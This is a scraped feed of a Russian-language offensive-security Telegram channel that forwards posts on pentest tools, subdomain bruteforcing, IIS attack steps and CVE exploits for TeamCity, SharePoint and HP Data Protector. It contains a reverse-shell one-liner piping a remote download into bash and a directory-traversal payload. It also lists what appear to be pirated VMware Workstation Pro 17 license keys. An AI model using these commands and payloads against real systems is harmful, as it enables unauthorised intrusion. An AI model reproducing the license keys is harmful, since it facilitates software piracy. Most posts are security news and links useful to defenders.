Pentester's Backlog
592 subscribers
313 photos
15 videos
44 files
426 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Forwarded from Proxy Bar
curlshell
reverse shell using curl
*
usage:
*
Start your listener:
./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234

On the remote side:
curl https://curlshell:1234 | bash

download

#shell #curl
#pentest #web

puredns

puredns is a fast domain resolver and subdomain bruteforcing tool that can accurately filter out wildcard subdomains and DNS poisoned entries.

It uses massdns, a powerful stub DNS resolver, to perform bulk lookups. With the proper bandwidth and a good list of public resolvers, it can resolve millions of queries in just a few minutes. Unfortunately, the results from massdns are only as good as the answers provided by the public resolvers. The results are often polluted by wrong DNS answers and false positives from wildcard subdomains.

Examples of usage:
puredns resolve domains.txt
puredns bruteforce wordlist.txt domain.com --resolvers public.txt
cat domains.txt | puredns resolve

Github
^ Как однажды писал @RalfHackerChannel
1) Собрать публичные резолверы через dnsvalidator (dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 100 -o resolvers.txt)
2) Взять какой-нибудь большой словарик отсюда
3) Пустить puredns bruteforce wordlist.txt domain (резолверы с файла resolvers.txt тулза подтянет автоматически)

Получится шикарный инструмент для сбора поддоменов!
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 We have reproduced the fresh CVE-2023-42793 in JetBrains TeamCity.

Authentication bypass allows an external attacker to gain administrative access to the server and execute any commands on it.

Update your software ASAP!
🔥1
#pentest

Плейлист с записями с прошедшего VolgaCTF 2023

тык
Forwarded from SHADOW:Group
​​💻Что поискать на сайте с IIS?

1. Используем shortscan, для поиска коротких (а по возможности и полных) имен файлов и расширений.

2. Проверяем наличие реверс прокси и пробуем directory traversal:
/backend/ -> 10.0.0.1/api/
/backend/..%2Ftest -> 10.0.0.1/test
Подробнее можно почитать тут.

3. Когда удастся получить раскрытие файлов, смотрим ключи в web.conf и пробуем получить RCE через дисериализацию. Почитать об этом тут.

4. Пробуем грузить файлы .asp, .aspx, .ashx и тд (полный список тут)

#web #iis #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
Не совсем #pentest, но всё же

У Aeza появился тариф VDS на сервере Стокгольма за 109(!!!) рублей / мес.

К тому же, с этих серверов можно сканить!
на свой страх и риск, информация неточная
Forwarded from Волосатый бублик
#web #portswigger #burp #nosql #injection

New topic on Web Security Academy — NoSQL injection

Dive into the world of NoSQL database security with the brand new NoSQL topic - read through the learning materials, then work through the labs to test your knowledge.

https://portswigger.net/web-security/nosql-injection
Forwarded from Proxy Bar
CVE-2023-29357
Microsoft SharePoint Server (2019) Elevation of Privilege Vulnerability
affected from 16.0.0 before 16.0.10399.20005
exploit
Всем хороших выходных!
🤝1💊1👾1
#pentest (???)
Forwarded from 
просто чтобы не потерять


VMware Workstation Pro 17 license keys
--checked
MC60H-DWHD5-H80U9-6V85M-8280D
4A4RR-813DK-M81A9-4U35H-06KND
--unchecked
NZ4RR-FTK5H-H81C1-Q30QH-1V2LA
JU090-6039P-08409-8J0QH-2YR7F
4Y09U-AJK97-089Z0-A3054-83KLA
4C21U-2KK9Q-M8130-4V2QH-CF810
Forwarded from 1N73LL1G3NC3
NetExec

This tool is based on CrackMapExec and was originally created by bytebleeder and maintained by mpgn over the years, shout out to them! With the retirement of mpgn, we decided to maintain the tool NetExec, formerly known as CrackMapExec, as a completely free open source tool.

Today will be our first release of NetExec version 1.0.0

NetExec wiki
Forwarded from sdnv's funk-hole
Пентестеры в СНГ часто сталкиваются с 1С-серверами внутри инфраструктур, один из векторов атак - Консоль Администрирования Кластеров 1С (RAS).
Чтобы попытаться подключиться к нему - подбирают версию клиента коноли аналогичную серверу, скачивают нужный серверный дистрибутив под винду и только тогда смогут зайти под имеющимися/пустыми кредами получая кучу полезной информации.

Я автоматизировал этот процесс благодаря консольной утилите rac от 1С для Linux. Более того, больше не нужно подбирать версию клиента и сервера - утилита rac работает с разными версиями серверов.

Этапы: Скан nmap с поиском открытых портов RAS, Сбор информации при успешном подключении к серверу, Выгрузка полученной информации в .csv под каждый сервер. Более подробно в README

https://github.com/sdnv0x4d/rasoff
#pentest #AD

В рамках проведения внутряка больших компаний один из моих любимейших низковисящих фруктов - RCE службы резервного копирования «HP Data Protector»
В большинстве своём имеем торчащий порт 5555, через который получается просто «zero-click» RCE с правами SYSTEM.

💻 Github
Please open Telegram to view this post
VIEW IN TELEGRAM
2